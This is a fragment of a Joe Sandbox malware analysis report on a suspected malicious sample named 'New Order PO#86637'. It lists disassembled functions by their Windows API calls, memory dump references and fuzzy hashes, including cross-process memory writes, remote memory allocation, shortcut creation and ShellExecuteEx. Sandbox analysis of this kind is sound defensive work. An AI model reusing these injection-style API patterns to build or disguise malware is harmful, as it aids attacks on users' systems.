                                                                            • DestroyIcon.USER32(?), ref: 00455752
                                                                            • DestroyWindow.USER32(?), ref: 00455760
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: DeleteDestroyObject$IconMessageSendWindow
                                                                            • String ID:
                                                                            • API String ID: 1489400265-0
                                                                            • Opcode ID: 7dd20da83386a23a1814408c1199d2c33e99a8c26f67204b6fd348d50f61361a
                                                                            • Instruction ID: 3262712e9a8127eed33bb9eb3d9864066e7dde5d47db0d590f2b6463dd6d37f9
                                                                            • Opcode Fuzzy Hash: 7dd20da83386a23a1814408c1199d2c33e99a8c26f67204b6fd348d50f61361a
                                                                            • Instruction Fuzzy Hash: 07017C74300601DBCB10EF25EEC8A2A73A8BF48712F004569FE019B286D778DC49CB68
                                                                            APIs
                                                                              • Part of subcall function 00430003: InvalidateRect.USER32(?,00000000,00000001), ref: 00430091
                                                                            • DestroyWindow.USER32(?), ref: 00455728
                                                                            • DeleteObject.GDI32(?), ref: 00455736
                                                                            • DeleteObject.GDI32(?), ref: 00455744
                                                                            • DestroyIcon.USER32(?), ref: 00455752
                                                                            • DestroyWindow.USER32(?), ref: 00455760
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: Destroy$DeleteObjectWindow$IconInvalidateRect
                                                                            • String ID:
                                                                            • API String ID: 1042038666-0
                                                                            • Opcode ID: 9df849479103f2de49514c9ec76f9cef1897402069f9b01ba3cc14c1fa4130bc
                                                                            • Instruction ID: 2016740d4609c4bbd0e5f1cf6dc7522ca00853e433b5032f7809eda0dc31aff9
                                                                            • Opcode Fuzzy Hash: 9df849479103f2de49514c9ec76f9cef1897402069f9b01ba3cc14c1fa4130bc
                                                                            • Instruction Fuzzy Hash: 3701F670200601DBCB10EF69E9D8A2B37ACAF49762B00466AFD01D7256D769DC498B69
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                            • String ID:
                                                                            • API String ID: 2625713937-0
                                                                            • Opcode ID: d1b587dd721dc2c7258c81d6469637db7768a45f5ba7f0175e0776e0e6e6c26f
                                                                            • Instruction ID: 382768f54733291aaafbd4c53fc5fd67df7ff3e11fccf1fbf51b229105ba29ed
                                                                            • Opcode Fuzzy Hash: d1b587dd721dc2c7258c81d6469637db7768a45f5ba7f0175e0776e0e6e6c26f
                                                                            • Instruction Fuzzy Hash: B3F036751125109BD3519F28FD4875E3B68E747321F94423AEA15923F0CB785449CB6D
                                                                            APIs
                                                                            • __getptd.LIBCMT ref: 0041780F
                                                                              • Part of subcall function 00417A69: __getptd_noexit.LIBCMT ref: 00417A6C
                                                                              • Part of subcall function 00417A69: __amsg_exit.LIBCMT ref: 00417A79
                                                                            • __getptd.LIBCMT ref: 00417826
                                                                            • __amsg_exit.LIBCMT ref: 00417834
                                                                            • __lock.LIBCMT ref: 00417844
                                                                            • __updatetlocinfoEx_nolock.LIBCMT ref: 00417858
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                            • String ID:
                                                                            • API String ID: 938513278-0
                                                                            • Opcode ID: 82c9f3bbc84dc287df7640515fd49376d4ae64643407e313ceafc36016311655
                                                                            • Instruction ID: 276dd8d19a6a3be70f37c916a71154ef36d62806621923b96dbf7b6e4fe89171
                                                                            • Opcode Fuzzy Hash: 82c9f3bbc84dc287df7640515fd49376d4ae64643407e313ceafc36016311655
                                                                            • Instruction Fuzzy Hash: 6DF09632A4C7009AD721BBA6940B7DD33B0AF10768F11415FF541572D2CB6C59C1CB9D
                                                                            APIs
                                                                              • Part of subcall function 004118F0: _doexit.LIBCMT ref: 004118FC
                                                                            • ___set_flsgetvalue.LIBCMT ref: 00413D20
                                                                              • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                                                              • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                                                            • ___fls_getvalue@4.LIBCMT ref: 00413D2B
                                                                              • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                                                            • ___fls_setvalue@8.LIBCMT ref: 00413D3E
                                                                            • GetLastError.KERNEL32(00000000,?,00000000), ref: 00413D47
                                                                            • ExitThread.KERNEL32 ref: 00413D4E
                                                                            • GetCurrentThreadId.KERNEL32 ref: 00413D54
                                                                            • __freefls@4.LIBCMT ref: 00413D74
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: Value$Thread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                                                                            • String ID:
                                                                            • API String ID: 2403457894-0
                                                                            • Opcode ID: 20cce849b0c51a5c00e20c35783146c720bf18a6b0a2527f17bda4bbe7e89b53
                                                                            • Instruction ID: 99982f4671f9afe760f134679f3a1374bf557b67af872bc9692f731b59fefeca
                                                                            • Opcode Fuzzy Hash: 20cce849b0c51a5c00e20c35783146c720bf18a6b0a2527f17bda4bbe7e89b53
                                                                            • Instruction Fuzzy Hash: 1AE04F318443056B8F013BB39C1E8CF363C9E0434AB20082ABE1493112DA2C99C1C6BE
                                                                            APIs
                                                                              • Part of subcall function 004118F0: _doexit.LIBCMT ref: 004118FC
                                                                            • ___set_flsgetvalue.LIBCMT ref: 004151C0
                                                                              • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                                                              • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                                                            • ___fls_getvalue@4.LIBCMT ref: 004151CB
                                                                              • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                                                            • ___fls_setvalue@8.LIBCMT ref: 004151DD
                                                                            • GetLastError.KERNEL32(00000000,?,00000000), ref: 004151E6
                                                                            • ExitThread.KERNEL32 ref: 004151ED
                                                                            • __freefls@4.LIBCMT ref: 00415209
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: Value$ErrorExitLastThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                                                                            • String ID:
                                                                            • API String ID: 4247068974-0
                                                                            • Opcode ID: 3508d61e785490a8cfc18c63a66594c600054726567160c295e9e14b5a274e31
                                                                            • Instruction ID: 3b3fb4cf1982b2ada2e5851f983e2cc6228237abb2dca353483d11accd99f00a
                                                                            • Opcode Fuzzy Hash: 3508d61e785490a8cfc18c63a66594c600054726567160c295e9e14b5a274e31
                                                                            • Instruction Fuzzy Hash: E5E0B631848705AECB013BB29D1E9DF3A799E54749B20082ABE1492122EE6C88D1C669
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: )$U$\
                                                                            • API String ID: 0-3705770531
                                                                            • Opcode ID: 028001eb2bff774db3903015b7fa80ce6d69291786b8857f67b928b721b55690
                                                                            • Instruction ID: d0f1885598f34d5f764b4f2a5794ec4e3d7857f6dac93f6e146ba8491093b400
                                                                            • Opcode Fuzzy Hash: 028001eb2bff774db3903015b7fa80ce6d69291786b8857f67b928b721b55690
                                                                            • Instruction Fuzzy Hash: 83C1C074A00249CFEB24CF69C5806AEBBF2FF85304F2481ABD8569B351D739994ACF15
                                                                            APIs
                                                                              • Part of subcall function 004426CD: _wcslen.LIBCMT ref: 004426F9
                                                                            • CoInitialize.OLE32(00000000), ref: 0046E505
                                                                            • CoCreateInstance.OLE32(00482A08,00000000,00000001,004828A8,?), ref: 0046E51E
                                                                            • CoUninitialize.OLE32 ref: 0046E53D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                            • String ID: .lnk
                                                                            • API String ID: 886957087-24824748
                                                                            • Opcode ID: 275befd32e5b5cb51e2fc879a9ecc6bbb724afd33f596a1e549e31a6ffdfd8c7
                                                                            • Instruction ID: 2644725dabb75134900838bfbf7f9974cf5b6b8c274c659ea1b0544ab4b4cf98
                                                                            • Opcode Fuzzy Hash: 275befd32e5b5cb51e2fc879a9ecc6bbb724afd33f596a1e549e31a6ffdfd8c7
                                                                            • Instruction Fuzzy Hash: A6A1CB756042019FC700EF65C980E5BB7E9AFC8308F108A5EF9859B392DB35EC45CBA6
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: _memmove
                                                                            • String ID: \
                                                                            • API String ID: 4104443479-2967466578
                                                                            • Opcode ID: 236e1e21dc65edc907fd0526d8e82b29cd887e6a6cae6abce2d2318f267918b8
                                                                            • Instruction ID: 90b25fc4546a2c21e21e7939c456fa175a28996bec6c3309f7edcf8d77039fcb
                                                                            • Opcode Fuzzy Hash: 236e1e21dc65edc907fd0526d8e82b29cd887e6a6cae6abce2d2318f267918b8
                                                                            • Instruction Fuzzy Hash: 8AB1C270D04289CFEF15CFA9C8807AEBBB2BF55308F28419ED451AB381D7795946CB1A
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: _memmove
                                                                            • String ID: \
                                                                            • API String ID: 4104443479-2967466578
                                                                            • Opcode ID: aaea77048b6460e77790bc9063151364371e311f89c51572a31744d174c5d814
                                                                            • Instruction ID: 47d8400a167da4587eb122393216330e55bf30386b581c043e0675457d4a745f
                                                                            • Opcode Fuzzy Hash: aaea77048b6460e77790bc9063151364371e311f89c51572a31744d174c5d814
                                                                            • Instruction Fuzzy Hash: F1B1C270D04289CFEF15CFA9C8807AEBBB2BF55308F28419ED451AB381D7795946CB1A
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: _memmove
                                                                            • String ID: \
                                                                            • API String ID: 4104443479-2967466578
                                                                            • Opcode ID: 51371dbcd6d614fdce5bfd4d2520a50a5cfc61004088100711ab8bbb78939718
                                                                            • Instruction ID: 4d1558bed40bbae7f26d93592334ac0d2c658ca85fbb7fec499742c135aa7d63
                                                                            • Opcode Fuzzy Hash: 51371dbcd6d614fdce5bfd4d2520a50a5cfc61004088100711ab8bbb78939718
                                                                            • Instruction Fuzzy Hash: E5A1C270D04289CFEF15CFA9C8807AEBBB2BF55308F28419ED441AB381D7795946CB1A
                                                                            Strings
                                                                            • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 0046A75B
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: _memmovestd::exception::exception$Exception@8Throw_malloc_wcslen
                                                                            • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                            • API String ID: 708495834-557222456
                                                                            • Opcode ID: 0835c6591df01f69715f5e8aca6b92cd03353c77de4b2b2244ddd74c7a14709d
                                                                            • Instruction ID: 9c514e09f8cb76db8ae150367893d7536957bb5c5403f45e3580b17af89e858a
                                                                            • Opcode Fuzzy Hash: 0835c6591df01f69715f5e8aca6b92cd03353c77de4b2b2244ddd74c7a14709d
                                                                            • Instruction Fuzzy Hash: 7C917F711087009FC310EF65C88186BB7E8AF89314F148D2FF595672A2E778E919CB9B
                                                                            APIs
                                                                              • Part of subcall function 00434319: WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0043434A
                                                                            • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 004365EF
                                                                              • Part of subcall function 004342DD: ReadProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0043430E
                                                                              • Part of subcall function 004343AD: GetWindowThreadProcessId.USER32(?,?), ref: 004343E0
                                                                              • Part of subcall function 004343AD: OpenProcess.KERNEL32(00000438,00000000,?), ref: 004343F1
                                                                              • Part of subcall function 004343AD: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004), ref: 00434408
                                                                            • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0043665F
                                                                            • SendMessageW.USER32(00000000,00001111,00000000,00000000), ref: 004366DF
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                            • String ID: @
                                                                            • API String ID: 4150878124-2766056989
                                                                            • Opcode ID: 6104cbe5d4ae3c4c99a3306f76968d572a7f9f5d55716afa725ed0ba86ca2a2d
                                                                            • Instruction ID: 60a9f40d71a87185ad744a771aacdfc79ad0a16393efc777ae91d2f205fac39b
                                                                            • Opcode Fuzzy Hash: 6104cbe5d4ae3c4c99a3306f76968d572a7f9f5d55716afa725ed0ba86ca2a2d
                                                                            • Instruction Fuzzy Hash: 0D51B972A00218ABCB10DFA5DD42FDEB778EFC9304F00459AFA05EB180D6B4BA45CB65
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: _memmove
                                                                            • String ID: \$]$h
                                                                            • API String ID: 4104443479-3262404753
                                                                            • Opcode ID: 176a597a96dcd2a70b70cc410daef71b144e937b03d0c11d284d361abdce2453
                                                                            • Instruction ID: f8aecd1968ad4f88b1990a67d2c0a139cd5c037738d7fdf96801fcbc28408ccb
                                                                            • Opcode Fuzzy Hash: 176a597a96dcd2a70b70cc410daef71b144e937b03d0c11d284d361abdce2453
                                                                            • Instruction Fuzzy Hash: 97518470E00209DFDF18CFA5C980AAEB7F2BF85304F29826AD405AB355D7385D45CB55
                                                                            APIs
                                                                            • ShellExecuteExW.SHELL32(0000003C), ref: 00457D67
                                                                              • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                                              • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                                            • CloseHandle.KERNEL32(?), ref: 00457E09
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: CloseExecuteHandleShell_wcscpy_wcslen
                                                                            • String ID: <$@
                                                                            • API String ID: 2417854910-1426351568
